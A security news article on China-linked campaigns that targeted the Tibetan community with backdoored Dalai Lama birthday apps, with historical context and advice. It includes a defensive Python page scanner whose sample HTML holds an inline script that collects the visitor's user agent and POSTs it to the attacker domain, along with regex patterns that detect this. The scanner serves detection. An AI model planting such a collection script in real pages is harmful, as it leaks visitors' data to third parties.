China-Based Cyber Espionage Groups Deploy Fake Dalai Lama Apps to Infiltrate Tibetan Community

In a series of sophisticated cyber espionage campaigns, China-linked Advanced Persistent Threats (APTs) have intensified their efforts to infiltrate the Tibetan community. These operations, identified as Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz, were strategically executed in June 2025, coinciding with the Dalai Lama’s 90th birthday on July 6, 2025.

Operation GhostChat:

The attackers compromised a legitimate website, replacing a link that originally directed users to tibetfund[.]org/90thbirthday with a fraudulent version hosted at thedalailama90.niccenter[.]net. The authentic page was intended for sending messages to the Dalai Lama. In contrast, the counterfeit page introduced an option to send encrypted messages by downloading a so-called secure chat application named TElement, purportedly a Tibetan version of the open-source encrypted chat software Element.

However, this version of TElement was backdoored, containing a malicious Dynamic Link Library (DLL) that, when executed, sideloaded Gh0st RAT—a remote access trojan extensively utilized by various Chinese hacking groups. Additionally, the fraudulent webpage embedded JavaScript code designed to collect visitors’ IP addresses and user-agent information, subsequently exfiltrating these details to the threat actors via an HTTP POST request.
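The two tampering signs described above (a trusted page's link swapped for one on the attacker's domain, and an inline script that reads the visitor's user agent and POSTs it out) are the kind of thing a site owner can check for on a scheduled crawl. The following Python script is an added illustration written for this article; it is not code from Zscaler ThreatLabz or from the campaigns themselves. It uses only the standard library. The domains come from the article (written without the "[.]" defanging so the URL parser can match them); the sample HTML, the URL paths, and the script body are constructed for the demo, and `example.com` stands in for any other unrecognised third-party host.

```python
"""Inspect a web page for watering-hole style tampering.

Flags (1) anchor links pointing at a known attacker domain, (2) links to any
host outside the site's expected set, and (3) inline scripts that both read
navigator.userAgent and issue an HTTP POST, the fingerprint-and-exfiltrate
pattern described in the GhostChat write-up.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the page is allowed to link to (from the article's legitimate link).
EXPECTED_HOSTS = {"tibetfund.org"}
# Attacker-controlled parent domain named in the article; subdomains match too.
KNOWN_BAD_HOSTS = {"niccenter.net"}

# Inline-script indicators: reading the UA string, and sending a POST either
# via fetch({method: "POST"}) or XMLHttpRequest.open("POST", ...).
COLLECT_RE = re.compile(r"navigator\.userAgent")
POST_RE = re.compile(r"method\s*:\s*['\"]POST['\"]|\.open\(\s*['\"]POST['\"]")


class PageInspector(HTMLParser):
    """Collects href targets and the text of every <script> block."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data, so buffer it.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))


def _matches(host, domain):
    """True if host equals domain or is a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def inspect_page(html):
    """Return a list of (finding_kind, evidence) tuples for one HTML document."""
    parser = PageInspector()
    parser.feed(html)
    parser.close()
    findings = []

    for link in parser.links:
        host = (urlparse(link).hostname or "").lower()
        if not host:
            continue  # relative link, same origin: nothing to check
        if any(_matches(host, bad) for bad in KNOWN_BAD_HOSTS):
            findings.append(("known_bad_link", link))
        elif not any(_matches(host, ok) for ok in EXPECTED_HOSTS):
            findings.append(("unexpected_external_link", link))

    for script in parser.scripts:
        if COLLECT_RE.search(script) and POST_RE.search(script):
            findings.append(("fingerprint_exfil_script", script.strip()[:60]))

    return findings


# Constructed sample: a page with the legitimate link, a swapped link on the
# attacker domain, an unrelated external link, and a collecting inline script.
SAMPLE_HTML = """
<html><body>
<a href="https://tibetfund.org/90thbirthday">Send a message</a>
<a href="https://thedalailama90.niccenter.net/telement">Send an encrypted message</a>
<a href="https://example.com/donate">Donate</a>
<a href="/about">About</a>
<script>
  var info = {ua: navigator.userAgent};
  fetch("https://thedalailama90.niccenter.net/collect",
        {method: "POST", body: JSON.stringify(info)});
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, evidence in inspect_page(SAMPLE_HTML):
        print(f"{kind}: {evidence}")
```

Run against a saved copy of each page on a schedule and alert on any `known_bad_link` or `fingerprint_exfil_script` finding; `unexpected_external_link` is noisier and is best compared against the previous crawl so that only newly introduced hosts raise an alert. The regexes are deliberately narrow (the article describes exactly UA collection plus an HTTP POST), so extend them if your pages legitimately use those APIs.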

Operation PhantomPrayers:

In this campaign, the attackers employed another deceptive domain, hhthedalailama90.niccenter[.]net, to distribute a counterfeit application named "90th Birthday Global Check-in" (DalaiLamaCheckin.exe). Upon execution, the application displayed an interactive map, prompting users to "send your blessings" to the Dalai Lama by selecting their location.

Unbeknownst to the users, the application utilized DLL side-loading techniques to deploy PhantomNet (also known as SManager), a backdoor that established communication with a command-and-control (C2) server over TCP. This connection enabled the download and execution of additional plugin DLLs on the compromised system. Notably, PhantomNet is capable of operating during specific hours or days, although this feature was not activated in the observed sample. The backdoor’s modular design, AES-encrypted C2 traffic, and configurable timed operations allowed for stealthy management of the infected systems.

Historical Context:

These incidents are not isolated. Chinese threat actors have a documented history of targeting the Tibetan community through various cyber espionage tactics. Notably, in 2009, the GhostNet operation infiltrated numerous computers across 103 countries, including those belonging to embassies, foreign ministries, and organizations affiliated with the Dalai Lama. The operation utilized emails containing malicious attachments to install trojans, granting attackers real-time control over infected systems. Similarly, the Shadow Network, uncovered in 2010, stole classified documents and emails from the Indian government and the Dalai Lama’s office, leveraging internet services like social networking and cloud platforms to host malware.

In 2013, the Chinese-language website of the Central Tibetan Administration (CTA) was hacked and infected with viruses, potentially enabling surveillance of visitors. Security experts noted that the CTA website had been under constant attack since 2011, with hackers employing watering-hole attacks to exploit vulnerabilities and gain unauthorized access to users’ systems.

Implications and Recommendations:

The recurrence of such targeted cyber attacks underscores the persistent threat faced by the Tibetan community from state-sponsored actors. These operations not only aim to gather sensitive information but also to monitor and potentially disrupt the activities of Tibetan organizations and individuals.

To mitigate these threats, it is imperative for individuals and organizations within the Tibetan community to:

– Exercise Caution with Digital Communications: Be vigilant when receiving unsolicited emails or messages, especially those containing links or attachments.

– Verify Authenticity of Applications: Only download software from official and trusted sources. Be wary of applications claiming to offer secure communication without proper verification.

– Implement Robust Security Measures: Regularly update software and operating systems to patch vulnerabilities. Utilize reputable antivirus and anti-malware solutions.

– Educate and Train Personnel: Conduct regular cybersecurity awareness training to recognize phishing attempts and other common attack vectors.

By adopting these practices, the Tibetan community can enhance its resilience against cyber espionage activities and safeguard its sensitive information from malicious actors.